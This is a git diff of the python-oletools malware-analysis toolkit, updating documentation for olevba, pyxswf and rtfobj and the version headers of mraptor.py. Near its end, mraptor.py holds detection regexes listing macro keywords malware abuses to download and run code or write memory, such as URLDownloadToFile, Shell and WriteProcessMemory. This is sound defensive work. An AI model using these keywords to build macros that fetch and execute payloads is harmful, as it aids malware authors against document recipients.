-As of v0.50, olevba has been ported to Python 3 thanks to @sebdraven. However, the differences between Python 2 and 3 are significant and for now there is a separate version of olevba named olevba3 to be used with Python 3.
+Since v0.54, olevba is fully compatible with both Python 2 and 3. There is no need to use olevba3 anymore; however, it is still present for backward compatibility.
How to use olevba in Python applications
olevba may be used to open a MS Office file, detect if it contains VBA macros, extract and analyze the VBA source code from your own python applications.
IMPORTANT: olevba is currently under active development, therefore this API is likely to change.
Import olevba
First, import the oletools.olevba package, using at least the VBA_Parser and VBA_Scanner classes:
-from oletools.olevba import VBA_Parser, TYPE_OLE, TYPE_OpenXML, TYPE_Word2003_XML, TYPE_MHTML
+from oletools.olevba import VBA_Parser, TYPE_OLE, TYPE_OpenXML, TYPE_Word2003_XML, TYPE_MHTML
Parse a MS Office file - VBA_Parser
To parse a file on disk, create an instance of the VBA_Parser class, providing the name of the file to open as parameter. For example:
-vbaparser = VBA_Parser('my_file_with_macros.doc')
+vbaparser = VBA_Parser('my_file_with_macros.doc')
The file may also be provided as a bytes string containing its data. In that case, the actual filename must be provided for reference, and the file content with the data parameter. For example:
-myfile = 'my_file_with_macros.doc'
-filedata = open(myfile, 'rb').read()
-vbaparser = VBA_Parser(myfile, data=filedata)
+myfile = 'my_file_with_macros.doc'
+filedata = open(myfile, 'rb').read()
+vbaparser = VBA_Parser(myfile, data=filedata)
VBA_Parser will raise an exception if the file is not a supported format, such as OLE (MS Office 97-2003), OpenXML (MS Office 2007+), MHTML or Word 2003 XML.
After parsing the file, the attribute VBA_Parser.type is a string indicating the file type. It can be either TYPE_OLE, TYPE_OpenXML, TYPE_Word2003_XML or TYPE_MHTML. (constants defined in the olevba module)
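As a sketch, dispatching on the type attribute might look like this. The literal string values below are illustrative stand-ins, not necessarily the library's own; in real code, import the TYPE_* constants from oletools.olevba and compare them against vbaparser.type after parsing a file:

```python
# Stand-ins for the TYPE_* constants defined in oletools.olevba;
# the literal values here are assumptions for illustration only.
TYPE_OLE = 'OLE'
TYPE_OpenXML = 'OpenXML'

filetype = TYPE_OLE  # in real code: vbaparser.type after VBA_Parser(...)

if filetype == TYPE_OLE:
    label = 'MS Office 97-2003 (OLE)'
elif filetype == TYPE_OpenXML:
    label = 'MS Office 2007+ (OpenXML)'
else:
    label = 'other supported format (Word 2003 XML, MHTML, ...)'
print(label)
```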
Detect VBA macros
The method detect_vba_macros of a VBA_Parser object returns True if VBA macros have been found in the file, False otherwise.
-if vbaparser.detect_vba_macros():
- print 'VBA Macros found'
-else:
- print 'No VBA Macros found'
+if vbaparser.detect_vba_macros():
+ print 'VBA Macros found'
+else:
+ print 'No VBA Macros found'
Note: The detection algorithm looks for streams and storage with specific names in the OLE structure, which works fine for all the supported formats listed above. However, for some formats such as PowerPoint 97-2003, this method will always return False because VBA Macros are stored in a different way which is not yet supported by olevba.
-Moreover, if the file contains an embedded document (e.g. an Excel workbook inserted into a Word document), this method may return True if the embedded document contains VBA Macros, even if the main document does not.
+Moreover, if the file contains an embedded document (e.g. an Excel workbook inserted into a Word document), this method may return True if the embedded document contains VBA Macros, even if the main document does not.
Extract VBA Macro Source Code
The method extract_macros extracts and decompresses source code for each VBA macro found in the file (possibly including embedded files). It is a generator yielding a tuple (filename, stream_path, vba_filename, vba_code) for each VBA macro found.
-- filename: If the file is OLE (MS Office 97-2003), filename is the path of the file. If the file is OpenXML (MS Office 2007+), filename is the path of the OLE subfile containing VBA macros within the zip archive, e.g. word/vbaProject.bin.
+- filename: If the file is OLE (MS Office 97-2003), filename is the path of the file. If the file is OpenXML (MS Office 2007+), filename is the path of the OLE subfile containing VBA macros within the zip archive, e.g. word/vbaProject.bin.
- stream_path: path of the OLE stream containing the VBA macro source code
- vba_filename: corresponding VBA filename
- vba_code: string containing the VBA source code in clear text
Example:
-for (filename, stream_path, vba_filename, vba_code) in vbaparser.extract_macros():
- print '-'*79
- print 'Filename :', filename
- print 'OLE stream :', stream_path
- print 'VBA filename:', vba_filename
- print '- '*39
- print vba_code
+for (filename, stream_path, vba_filename, vba_code) in vbaparser.extract_macros():
+ print '-'*79
+ print 'Filename :', filename
+ print 'OLE stream :', stream_path
+ print 'VBA filename:', vba_filename
+ print '- '*39
+ print vba_code
Alternatively, the VBA_Parser method extract_all_macros returns the same results as a list of tuples.
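For illustration, that list can be post-processed like any Python list of tuples. The sample data below is a hypothetical stand-in for the result of a real extract_all_macros call, with made-up filenames and stream paths:

```python
# Hypothetical stand-in for vbaparser.extract_all_macros(); each entry is
# (filename, stream_path, vba_filename, vba_code) as documented above.
macros = [
    ('file.doc', 'Macros/VBA/ThisDocument', 'ThisDocument.cls',
     'Sub AutoOpen()\nEnd Sub'),
    ('file.doc', 'Macros/VBA/Module1', 'Module1.bas',
     'Sub Payload()\nEnd Sub'),
]
# e.g. keep only the modules whose source code mentions AutoOpen:
auto_open = [m for m in macros if 'AutoOpen' in m[3]]
print('%d of %d module(s) contain AutoOpen' % (len(auto_open), len(macros)))
```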
Analyze VBA Source Code
Since version 0.40, the VBA_Parser class provides simpler methods than VBA_Scanner to analyze all macros contained in a file:
@@ -278,29 +324,29 @@ Analyze VBA Source Code
analyze_macros() takes an optional argument show_decoded_strings: if set to True, the results will contain all the encoded strings found in the code (Hex, Base64, Dridex) with their decoded value. By default, it will only include the strings which contain printable characters.
VBA_Parser.analyze_macros() returns a list of tuples (type, keyword, description), one for each item in the results.
-- type may be either 'AutoExec', 'Suspicious', 'IOC', 'Hex String', 'Base64 String', 'Dridex String' or 'VBA obfuscated Strings'.
+- type may be either ‘AutoExec’, ‘Suspicious’, ‘IOC’, ‘Hex String’, ‘Base64 String’, ‘Dridex String’ or ‘VBA obfuscated Strings’.
- keyword is the string found for auto-executable macros, suspicious keywords or IOCs. For obfuscated strings, it is the decoded value of the string.
- description provides a description of the keyword. For obfuscated strings, it is the encoded value of the string.
Example:
-results = vbaparser.analyze_macros()
-for kw_type, keyword, description in results:
- print 'type=%s - keyword=%s - description=%s' % (kw_type, keyword, description)
+results = vbaparser.analyze_macros()
+for kw_type, keyword, description in results:
+ print 'type=%s - keyword=%s - description=%s' % (kw_type, keyword, description)
After calling analyze_macros, the following VBA_Parser attributes also provide the number of items found for each category:
-print 'AutoExec keywords: %d' % vbaparser.nb_autoexec
-print 'Suspicious keywords: %d' % vbaparser.nb_suspicious
-print 'IOCs: %d' % vbaparser.nb_iocs
-print 'Hex obfuscated strings: %d' % vbaparser.nb_hexstrings
-print 'Base64 obfuscated strings: %d' % vbaparser.nb_base64strings
-print 'Dridex obfuscated strings: %d' % vbaparser.nb_dridexstrings
-print 'VBA obfuscated strings: %d' % vbaparser.nb_vbastrings
+print 'AutoExec keywords: %d' % vbaparser.nb_autoexec
+print 'Suspicious keywords: %d' % vbaparser.nb_suspicious
+print 'IOCs: %d' % vbaparser.nb_iocs
+print 'Hex obfuscated strings: %d' % vbaparser.nb_hexstrings
+print 'Base64 obfuscated strings: %d' % vbaparser.nb_base64strings
+print 'Dridex obfuscated strings: %d' % vbaparser.nb_dridexstrings
+print 'VBA obfuscated strings: %d' % vbaparser.nb_vbastrings
Deobfuscate VBA Macro Source Code
The method reveal attempts to deobfuscate the macro source code by replacing all the obfuscated strings by their decoded content. Returns a single string.
Example:
-print vbaparser.reveal()
+print vbaparser.reveal()
Close the VBA_Parser
After usage, it is better to call the close method of the VBA_Parser object, to make sure the file is closed, especially if your application is parsing many files.
-vbaparser.close()
+vbaparser.close()
Deprecated API
The following methods and functions are still functional, but their usage is not recommended since they have been replaced by better solutions.
@@ -310,59 +356,59 @@ VBA_Scanner (deprecated)
scan() takes an optional argument include_decoded_strings: if set to True, the results will contain all the encoded strings found in the code (Hex, Base64, Dridex) with their decoded value.
scan returns a list of tuples (type, keyword, description), one for each item in the results.
-- type may be either 'AutoExec', 'Suspicious', 'IOC', 'Hex String', 'Base64 String' or 'Dridex String'.
+- type may be either ‘AutoExec’, ‘Suspicious’, ‘IOC’, ‘Hex String’, ‘Base64 String’ or ‘Dridex String’.
- keyword is the string found for auto-executable macros, suspicious keywords or IOCs. For obfuscated strings, it is the decoded value of the string.
- description provides a description of the keyword. For obfuscated strings, it is the encoded value of the string.
Example:
-vba_scanner = VBA_Scanner(vba_code)
-results = vba_scanner.scan(include_decoded_strings=True)
-for kw_type, keyword, description in results:
- print 'type=%s - keyword=%s - description=%s' % (kw_type, keyword, description)
+vba_scanner = VBA_Scanner(vba_code)
+results = vba_scanner.scan(include_decoded_strings=True)
+for kw_type, keyword, description in results:
+ print 'type=%s - keyword=%s - description=%s' % (kw_type, keyword, description)
The function scan_vba is a shortcut for VBA_Scanner(vba_code).scan():
-results = scan_vba(vba_code, include_decoded_strings=True)
-for kw_type, keyword, description in results:
- print 'type=%s - keyword=%s - description=%s' % (kw_type, keyword, description)
+results = scan_vba(vba_code, include_decoded_strings=True)
+for kw_type, keyword, description in results:
+ print 'type=%s - keyword=%s - description=%s' % (kw_type, keyword, description)
scan_summary returns a tuple with the number of items found for each category: (autoexec, suspicious, IOCs, hex, base64, dridex).
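A sketch of consuming that tuple follows; the counts are made-up placeholder values standing in for an actual scan_summary() result, unpacked in the documented order:

```python
# Placeholder counts standing in for a real scan_summary() result;
# documented order: (autoexec, suspicious, iocs, hex, base64, dridex)
summary = (2, 5, 3, 1, 0, 0)
autoexec, suspicious, iocs, hexstrings, base64strings, dridexstrings = summary
print('AutoExec=%d Suspicious=%d IOCs=%d' % (autoexec, suspicious, iocs))
```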
Detect auto-executable macros (deprecated)
Deprecated: It is preferable to use either scan_vba or VBA_Scanner to get all results at once.
The function detect_autoexec checks if VBA macro code contains specific macro names that will be triggered when the document/workbook is opened, closed, changed, etc.
It returns a list of tuples containing two strings, the detected keyword, and the description of the trigger. (See the malware example above)
Sample usage:
-from oletools.olevba import detect_autoexec
-autoexec_keywords = detect_autoexec(vba_code)
-if autoexec_keywords:
- print 'Auto-executable macro keywords found:'
- for keyword, description in autoexec_keywords:
- print '%s: %s' % (keyword, description)
-else:
- print 'Auto-executable macro keywords: None found'
+from oletools.olevba import detect_autoexec
+autoexec_keywords = detect_autoexec(vba_code)
+if autoexec_keywords:
+ print 'Auto-executable macro keywords found:'
+ for keyword, description in autoexec_keywords:
+ print '%s: %s' % (keyword, description)
+else:
+ print 'Auto-executable macro keywords: None found'
Detect suspicious VBA keywords (deprecated)
Deprecated: It is preferable to use either scan_vba or VBA_Scanner to get all results at once.
The function detect_suspicious checks if VBA macro code contains specific keywords often used by malware to act on the system (create files, run commands or applications, write to the registry, etc).
It returns a list of tuples containing two strings, the detected keyword, and the description of the corresponding malicious behaviour. (See the malware example above)
Sample usage:
-from oletools.olevba import detect_suspicious
-suspicious_keywords = detect_suspicious(vba_code)
-if suspicious_keywords:
- print 'Suspicious VBA keywords found:'
- for keyword, description in suspicious_keywords:
- print '%s: %s' % (keyword, description)
-else:
- print 'Suspicious VBA keywords: None found'
+from oletools.olevba import detect_suspicious
+suspicious_keywords = detect_suspicious(vba_code)
+if suspicious_keywords:
+ print 'Suspicious VBA keywords found:'
+ for keyword, description in suspicious_keywords:
+ print '%s: %s' % (keyword, description)
+else:
+ print 'Suspicious VBA keywords: None found'
Extract potential IOCs (deprecated)
Deprecated: It is preferable to use either scan_vba or VBA_Scanner to get all results at once.
The function detect_patterns checks if VBA macro code contains specific patterns of interest, that may be useful for malware analysis and detection (potential Indicators of Compromise): IP addresses, e-mail addresses, URLs, executable file names.
It returns a list of tuples containing two strings, the pattern type, and the extracted value. (See the malware example above)
Sample usage:
-from oletools.olevba import detect_patterns
-patterns = detect_patterns(vba_code)
-if patterns:
- print 'Patterns found:'
- for pattern_type, value in patterns:
- print '%s: %s' % (pattern_type, value)
-else:
- print 'Patterns: None found'
+from oletools.olevba import detect_patterns
+patterns = detect_patterns(vba_code)
+if patterns:
+ print 'Patterns found:'
+ for pattern_type, value in patterns:
+ print '%s: %s' % (pattern_type, value)
+else:
+ print 'Patterns: None found'
python-oletools documentation
@@ -372,16 +418,17 @@ python-oletools documentation
- Contribute, Suggest Improvements or Report Issues
- Tools:
diff --git a/oletools/doc/olevba.md b/oletools/doc/olevba.md
index 5b1e130f..8d18dcac 100644
--- a/oletools/doc/olevba.md
+++ b/oletools/doc/olevba.md
@@ -8,6 +8,7 @@ VBA keywords** used by malware, anti-sandboxing and anti-virtualization techniqu
and potential **IOCs** (IP addresses, URLs, executable filenames, etc).
It also detects and decodes several common **obfuscation methods including Hex encoding,
StrReverse, Base64, Dridex, VBA expressions**, and extracts IOCs from decoded strings.
+XLM/Excel 4 Macros are also supported in Excel and SLK files.
It can be used either as a command-line tool, or as a python module from your own applications.
@@ -18,17 +19,18 @@ by John William Davison, with significant modifications.
## Supported formats
-- Word 97-2003 (.doc, .dot)
-- Word 2007+ (.docm, .dotm)
+- Word 97-2003 (.doc, .dot), Word 2007+ (.docm, .dotm)
+- Excel 97-2003 (.xls), Excel 2007+ (.xlsm, .xlsb)
+- PowerPoint 97-2003 (.ppt), PowerPoint 2007+ (.pptm, .ppsm)
+- Word/PowerPoint 2007+ XML (aka Flat OPC)
- Word 2003 XML (.xml)
-- Word/Excel MHTML, aka Single File Web Page (.mht)
-- Excel 97-2003 (.xls)
-- Excel 2007+ (.xlsm, .xlsb)
-- PowerPoint 2007+ (.pptm, .ppsm)
+- Word/Excel Single File Web Page / MHTML (.mht)
+- Publisher (.pub)
+- SYLK/SLK files (.slk)
- Text file containing VBA or VBScript source code
- Password-protected Zip archive containing any of the above
-## Main Features
+## Main Features
- Detect VBA macros in MS Office 97-2003 and 2007+ files, XML, MHT
- Extract VBA macro source code
@@ -67,85 +69,95 @@ and potential IOCs (URLs, IP addresses, e-mail addresses, executable filenames,
## Usage
```text
-Usage: olevba.py [options] [filename2 ...]
-
+Usage: olevba [options] [filename2 ...]
+
Options:
-h, --help show this help message and exit
-r find files recursively in subdirectories.
-z ZIP_PASSWORD, --zip=ZIP_PASSWORD
if the file is a zip archive, open all files from it,
- using the provided password (requires Python 2.6+)
+ using the provided password.
+ -p PASSWORD, --password=PASSWORD
+ if encrypted office files are encountered, try
+ decryption with this password. May be repeated.
-f ZIP_FNAME, --zipfname=ZIP_FNAME
if the file is a zip archive, file(s) to be opened
within the zip. Wildcards * and ? are supported.
(default:*)
- -t, --triage triage mode, display results as a summary table
- (default for multiple files)
- -d, --detailed detailed mode, display full results (default for
- single file)
-a, --analysis display only analysis results, not the macro source
code
-c, --code display only VBA source code, do not analyze it
- -i INPUT, --input=INPUT
- input file containing VBA source code to be analyzed
- (no parsing)
--decode display all the obfuscated strings with their decoded
content (Hex, Base64, StrReverse, Dridex, VBA).
--attr display the attribute lines at the beginning of VBA
source code
--reveal display the macro source code after replacing all the
obfuscated strings by their decoded content.
+ -l LOGLEVEL, --loglevel=LOGLEVEL
+ logging level debug/info/warning/error/critical
+ (default=warning)
+ --deobf Attempt to deobfuscate VBA expressions (slow)
+ --relaxed Do not raise errors if opening of substream fails
+
+ Output mode (mutually exclusive):
+ -t, --triage triage mode, display results as a summary table
+ (default for multiple files)
+ -d, --detailed detailed mode, display full results (default for
+ single file)
+ -j, --json json mode, detailed in json format (never default)
```
+**New in v0.54:** the -p option can now be used to decrypt encrypted documents using the provided password(s).
+
### Examples
Scan a single file:
```text
-olevba.py file.doc
+olevba file.doc
```
Scan a single file, stored in a Zip archive with password "infected":
```text
-olevba.py malicious_file.xls.zip -z infected
+olevba malicious_file.xls.zip -z infected
```
Scan a single file, showing all obfuscated strings decoded:
```text
-olevba.py file.doc --decode
+olevba file.doc --decode
```
Scan a single file, showing the macro source code with VBA strings deobfuscated:
```text
-olevba.py file.doc --reveal
+olevba file.doc --reveal
```
Scan VBA source code extracted into a text file:
```text
-olevba.py source_code.vba
+olevba source_code.vba
```
Scan a collection of files stored in a folder:
```text
-olevba.py "MalwareZoo/VBA/*"
+olevba "MalwareZoo/VBA/*"
```
NOTE: On Linux, MacOSX and other Unix variants, it is required to add double quotes around wildcards. Otherwise, they will be expanded by the shell instead of olevba.
Scan all .doc and .xls files, recursively in all subfolders:
```text
-olevba.py "MalwareZoo/VBA/*.doc" "MalwareZoo/VBA/*.xls" -r
+olevba "MalwareZoo/VBA/*.doc" "MalwareZoo/VBA/*.xls" -r
```
Scan all .doc files within all .zip files with password, recursively:
```text
-olevba.py "MalwareZoo/VBA/*.zip" -r -z infected -f "*.doc"
+olevba "MalwareZoo/VBA/*.zip" -r -z infected -f "*.doc"
```
@@ -156,7 +168,7 @@ When a single file is scanned, or when using the option -d, all details of the a
For example, checking the malware sample [DIAN_caso-5415.doc](https://malwr.com/analysis/M2I4YWRhM2IwY2QwNDljN2E3ZWFjYTg3ODk4NmZhYmE/):
```text
->olevba.py c:\MalwareZoo\VBA\DIAN_caso-5415.doc.zip -z infected
+>olevba c:\MalwareZoo\VBA\DIAN_caso-5415.doc.zip -z infected
===============================================================================
FILE: DIAN_caso-5415.doc.malware in c:\MalwareZoo\VBA\DIAN_caso-5415.doc.zip
Type: OLE
@@ -233,7 +245,7 @@ The following flags show the results of the analysis:
Here is an example:
```text
-c:\>olevba.py \MalwareZoo\VBA\samples\*
+c:\>olevba \MalwareZoo\VBA\samples\*
Flags Filename
----------- -----------------------------------------------------------------
OLE:MASI--- \MalwareZoo\VBA\samples\DIAN_caso-5415.doc.malware
@@ -256,10 +268,9 @@ OLE:MA----- \MalwareZoo\VBA\samples\Word within Word macro auto.doc
## Python 3 support - olevba3
-As of v0.50, olevba has been ported to Python 3 thanks to @sebdraven.
-However, the differences between Python 2 and 3 are significant and for now
-there is a separate version of olevba named olevba3 to be used with
-Python 3.
+Since v0.54, olevba is fully compatible with both Python 2 and 3.
+There is no need to use olevba3 anymore; however, it is still present for backward compatibility.
+
--------------------------------------------------------------------------
@@ -531,14 +542,15 @@ python-oletools documentation
- [[Install]]
- [[Contribute]], Suggest Improvements or Report Issues
- Tools:
+ - [[mraptor]]
+ - [[msodde]]
- [[olebrowse]]
+ - [[oledir]]
- [[oleid]]
+ - [[olemap]]
- [[olemeta]]
+ - [[oleobj]]
- [[oletimes]]
- - [[oledir]]
- - [[olemap]]
- [[olevba]]
- - [[mraptor]]
- [[pyxswf]]
- - [[oleobj]]
- [[rtfobj]]
diff --git a/oletools/doc/pyxswf.html b/oletools/doc/pyxswf.html
index 4e135afd..e76c31c3 100644
--- a/oletools/doc/pyxswf.html
+++ b/oletools/doc/pyxswf.html
@@ -1,22 +1,30 @@
-
-
+
+
-
-
+
-
-
+
+ Untitled
+
+
pyxswf
-pyxswf is a script to detect, extract and analyze Flash objects (SWF files) that may be embedded in files such as MS Office documents (e.g. Word, Excel), which is especially useful for malware analysis.
+pyxswf is a script to detect, extract and analyze Flash objects (SWF files) that may be embedded in files such as MS Office documents (e.g. Word, Excel), which is especially useful for malware analysis.
It is part of the python-oletools package.
pyxswf is an extension to xxxswf.py published by Alexander Hanel.
Compared to xxxswf, it can extract streams from MS Office documents by parsing their OLE structure properly, which is necessary when streams are fragmented. Stream fragmentation is a known obfuscation technique, as explained on http://www.breakingpointsystems.com/resources/blog/evasion-with-ole2-fragmentation/
It can also extract Flash objects from RTF documents, by parsing embedded objects encoded in hexadecimal format (-f option).
For this, simply add the -o option to work on OLE streams rather than raw files, or the -f option to work on RTF files.
Usage
-Usage: pyxswf.py [options] <file.bad>
+Usage: pyxswf [options] <file.bad>
Options:
-o, --ole Parse an OLE file (e.g. Word, Excel) to look for SWF
@@ -38,18 +46,18 @@ Usage
contain SWFs. Must provide path in quotes
-c, --compress Compresses the SWF using Zlib
Example 1 - detecting and extracting a SWF file from a Word document on Windows:
-C:\oletools>pyxswf.py -o word_flash.doc
+C:\oletools>pyxswf -o word_flash.doc
OLE stream: 'Contents'
[SUMMARY] 1 SWF(s) in MD5:993664cc86f60d52d671b6610813cfd1:Contents
[ADDR] SWF 1 at 0x8 - FWS Header
-C:\oletools>pyxswf.py -xo word_flash.doc
+C:\oletools>pyxswf -xo word_flash.doc
OLE stream: 'Contents'
[SUMMARY] 1 SWF(s) in MD5:993664cc86f60d52d671b6610813cfd1:Contents
[ADDR] SWF 1 at 0x8 - FWS Header
[FILE] Carved SWF MD5: 2498e9c0701dc0e461ab4358f9102bc5.swf
Example 2 - detecting and extracting a SWF file from a RTF document on Windows:
-C:\oletools>pyxswf.py -xf "rtf_flash.rtf"
+C:\oletools>pyxswf -xf "rtf_flash.rtf"
RTF embedded object size 1498557 at index 000036DD
[SUMMARY] 1 SWF(s) in MD5:46a110548007e04f4043785ac4184558:RTF_embedded_object_0
00036DD
@@ -66,16 +74,17 @@ python-oletools documentation
Contribute, Suggest Improvements or Report Issues
Tools:
diff --git a/oletools/doc/pyxswf.md b/oletools/doc/pyxswf.md
index e56b88c8..6be489a0 100644
--- a/oletools/doc/pyxswf.md
+++ b/oletools/doc/pyxswf.md
@@ -21,7 +21,7 @@ For this, simply add the -o option to work on OLE streams rather than raw files,
## Usage
```text
-Usage: pyxswf.py [options]
+Usage: pyxswf [options]
Options:
-o, --ole Parse an OLE file (e.g. Word, Excel) to look for SWF
@@ -47,12 +47,12 @@ Options:
### Example 1 - detecting and extracting a SWF file from a Word document on Windows:
```text
-C:\oletools>pyxswf.py -o word_flash.doc
+C:\oletools>pyxswf -o word_flash.doc
OLE stream: 'Contents'
[SUMMARY] 1 SWF(s) in MD5:993664cc86f60d52d671b6610813cfd1:Contents
[ADDR] SWF 1 at 0x8 - FWS Header
-C:\oletools>pyxswf.py -xo word_flash.doc
+C:\oletools>pyxswf -xo word_flash.doc
OLE stream: 'Contents'
[SUMMARY] 1 SWF(s) in MD5:993664cc86f60d52d671b6610813cfd1:Contents
[ADDR] SWF 1 at 0x8 - FWS Header
@@ -62,7 +62,7 @@ OLE stream: 'Contents'
### Example 2 - detecting and extracting a SWF file from a RTF document on Windows:
```text
-C:\oletools>pyxswf.py -xf "rtf_flash.rtf"
+C:\oletools>pyxswf -xf "rtf_flash.rtf"
RTF embedded object size 1498557 at index 000036DD
[SUMMARY] 1 SWF(s) in MD5:46a110548007e04f4043785ac4184558:RTF_embedded_object_0
00036DD
@@ -84,14 +84,15 @@ python-oletools documentation
- [[Install]]
- [[Contribute]], Suggest Improvements or Report Issues
- Tools:
+ - [[mraptor]]
+ - [[msodde]]
- [[olebrowse]]
+ - [[oledir]]
- [[oleid]]
+ - [[olemap]]
- [[olemeta]]
+ - [[oleobj]]
- [[oletimes]]
- - [[oledir]]
- - [[olemap]]
- [[olevba]]
- - [[mraptor]]
- [[pyxswf]]
- - [[oleobj]]
- [[rtfobj]]
diff --git a/oletools/doc/rtfobj.html b/oletools/doc/rtfobj.html
index e3386d9f..fa79807d 100644
--- a/oletools/doc/rtfobj.html
+++ b/oletools/doc/rtfobj.html
@@ -1,53 +1,89 @@
-
-
+
+
-
-
+
-
-
+
+ Untitled
+
+
rtfobj
rtfobj is a Python module to detect and extract embedded objects stored in RTF files, such as OLE objects. It can also detect OLE Package objects, and extract the embedded files.
-Since v0.50, rtfobj contains a custom RTF parser that has been designed to match MS Word's behaviour, in order to handle obfuscated RTF files. See my article "Anti-Analysis Tricks in Weaponized RTF" for some concrete examples.
+Since v0.50, rtfobj contains a custom RTF parser that has been designed to match MS Word’s behaviour, in order to handle obfuscated RTF files. See my article “Anti-Analysis Tricks in Weaponized RTF” for some concrete examples.
rtfobj can be used as a Python library or a command-line tool.
It is part of the python-oletools package.
Usage
@@ -73,22 +109,19 @@ Usage
-d OUTPUT_DIR use specified directory to save output files.
rtfobj displays a list of the OLE and Package objects that have been detected, with their attributes such as class and filename.
When an OLE Package object contains an executable file or script, it is highlighted as such. For example:
-
-
-
-
+![](rtfobj1.png)
To extract an object or file, use the option -s followed by the object number as shown in the table.
Example:
rtfobj -s 0
-It extracts and decodes the corresponding object, and saves it as a file named "object_xxxx.bin", xxxx being the location of the object in the RTF file.
+It extracts and decodes the corresponding object, and saves it as a file named “object_xxxx.bin”, xxxx being the location of the object in the RTF file.
How to use rtfobj in Python applications
As of v0.50, the API has changed significantly and it is not final yet. For now, see the class RtfObjectParser in the code.
Deprecated API (still functional):
rtf_iter_objects(filename) is an iterator which yields a tuple (index, orig_len, object) providing the index of each hexadecimal stream in the RTF file, and the corresponding decoded object.
Example:
-from oletools import rtfobj
-for index, orig_len, data in rtfobj.rtf_iter_objects("myfile.rtf"):
- print('found object size %d at index %08X' % (len(data), index))
+from oletools import rtfobj
+for index, orig_len, data in rtfobj.rtf_iter_objects("myfile.rtf"):
+ print('found object size %d at index %08X' % (len(data), index))
python-oletools documentation
@@ -98,16 +131,17 @@ python-oletools documentation
- Contribute, Suggest Improvements or Report Issues
- Tools:
diff --git a/oletools/doc/rtfobj.md b/oletools/doc/rtfobj.md
index 79f7deba..5c5b511e 100644
--- a/oletools/doc/rtfobj.md
+++ b/oletools/doc/rtfobj.md
@@ -89,14 +89,15 @@ python-oletools documentation
- [[Install]]
- [[Contribute]], Suggest Improvements or Report Issues
- Tools:
+ - [[mraptor]]
+ - [[msodde]]
- [[olebrowse]]
+ - [[oledir]]
- [[oleid]]
+ - [[olemap]]
- [[olemeta]]
+ - [[oleobj]]
- [[oletimes]]
- - [[oledir]]
- - [[olemap]]
- [[olevba]]
- - [[mraptor]]
- [[pyxswf]]
- - [[oleobj]]
- [[rtfobj]]
diff --git a/oletools/ezhexviewer.py b/oletools/ezhexviewer.py
index 701f05e1..142d547e 100644
--- a/oletools/ezhexviewer.py
+++ b/oletools/ezhexviewer.py
@@ -16,7 +16,7 @@
ezhexviewer project website: http://www.decalage.info/python/ezhexviewer
-ezhexviewer is copyright (c) 2012-2017, Philippe Lagadec (http://www.decalage.info)
+ezhexviewer is copyright (c) 2012-2019, Philippe Lagadec (http://www.decalage.info)
All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
@@ -48,8 +48,9 @@
# 2016-10-26 PL: - fixed to run on Python 2+3
# 2017-03-23 v0.51 PL: - fixed display of control characters (issue #151)
# 2017-04-26 PL: - fixed absolute imports (issue #141)
+# 2018-09-15 v0.54 PL: - easygui is now a dependency
-__version__ = '0.51'
+__version__ = '0.54'
#-----------------------------------------------------------------------------
# TODO:
@@ -71,7 +72,7 @@
if not _parent_dir in sys.path:
sys.path.insert(0, _parent_dir)
-from oletools.thirdparty.easygui import easygui
+import easygui
# === PYTHON 2+3 SUPPORT ======================================================
diff --git a/oletools/mraptor.py b/oletools/mraptor.py
index 7504dbdc..198b90d9 100644
--- a/oletools/mraptor.py
+++ b/oletools/mraptor.py
@@ -9,6 +9,7 @@
- Word 97-2003 (.doc, .dot), Word 2007+ (.docm, .dotm)
- Excel 97-2003 (.xls), Excel 2007+ (.xlsm, .xlsb)
- PowerPoint 97-2003 (.ppt), PowerPoint 2007+ (.pptm, .ppsm)
+- Word/PowerPoint 2007+ XML (aka Flat OPC)
- Word 2003 XML (.xml)
- Word/Excel Single File Web Page / MHTML (.mht)
- Publisher (.pub)
@@ -22,7 +23,7 @@
# === LICENSE ==================================================================
-# MacroRaptor is copyright (c) 2016-2017 Philippe Lagadec (http://www.decalage.info)
+# MacroRaptor is copyright (c) 2016-2019 Philippe Lagadec (http://www.decalage.info)
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
@@ -56,8 +57,12 @@
# 2016-10-25 PL: - fixed print for Python 3
# 2016-12-21 v0.51 PL: - added more ActiveX macro triggers
# 2017-03-08 PL: - fixed absolute imports
+# 2018-05-25 v0.53 PL: - added Word/PowerPoint 2007+ XML (aka Flat OPC) issue #283
+# 2019-04-04 v0.54 PL: - added ExecuteExcel4Macro, ShellExecuteA, XLM keywords
+# 2019-11-06 v0.55 PL: - added SetTimer
+# 2020-04-20 v0.56 PL: - added keywords RUN and CALL for XLM macros (issue #562)
-__version__ = '0.51'
+__version__ = '0.56dev5'
#------------------------------------------------------------------------------
# TODO:
@@ -83,6 +88,7 @@
from oletools.thirdparty.tablestream import tablestream
from oletools import olevba
+from oletools.olevba import TYPE2TAG
# === LOGGING =================================================================
@@ -116,29 +122,21 @@
r'|DocumentComplete|DownloadBegin|DownloadComplete|FileDownload' +
r'|NavigateComplete2|NavigateError|ProgressChange|PropertyChange' +
r'|SetSecureLockIcon|StatusTextChange|TitleChange|MouseMove' +
- r'|MouseEnter|MouseLeave|))\b')
+ r'|MouseEnter|MouseLeave|OnConnecting))|Auto_Ope\b')
+# TODO: "Auto_Ope" is temporarily here because of a bug in plugin_biff, which misses the last byte in "Auto_Open"...
# MS-VBAL 5.4.5.1 Open Statement:
RE_OPEN_WRITE = r'(?:\bOpen\b[^\n]+\b(?:Write|Append|Binary|Output|Random)\b)'
re_write = re.compile(r'(?i)\b(?:FileCopy|CopyFile|Kill|CreateTextFile|'
- + r'VirtualAlloc|RtlMoveMemory|URLDownloadToFileA?|AltStartupPath|'
+ + r'VirtualAlloc|RtlMoveMemory|URLDownloadToFileA?|AltStartupPath|WriteProcessMemory|'
+ r'ADODB\.Stream|WriteText|SaveToFile|SaveAs|SaveAsRTF|FileSaveAs|MkDir|RmDir|SaveSetting|SetAttr)\b|' + RE_OPEN_WRITE)
# MS-VBAL 5.2.3.5 External Procedure Declaration
RE_DECLARE_LIB = r'(?:\bDeclare\b[^\n]+\bLib\b)'
-re_execute = re.compile(r'(?i)\b(?:Shell|CreateObject|GetObject|SendKeys|'
- + r'MacScript|FollowHyperlink|CreateThread|ShellExecute)\b|' + RE_DECLARE_LIB)
-
-# short tag to display file types in triage mode:
-TYPE2TAG = {
- olevba.TYPE_OLE: 'OLE',
- olevba.TYPE_OpenXML: 'OpX',
- olevba.TYPE_Word2003_XML: 'XML',
- olevba.TYPE_MHTML: 'MHT',
- olevba.TYPE_TEXT: 'TXT',
-}
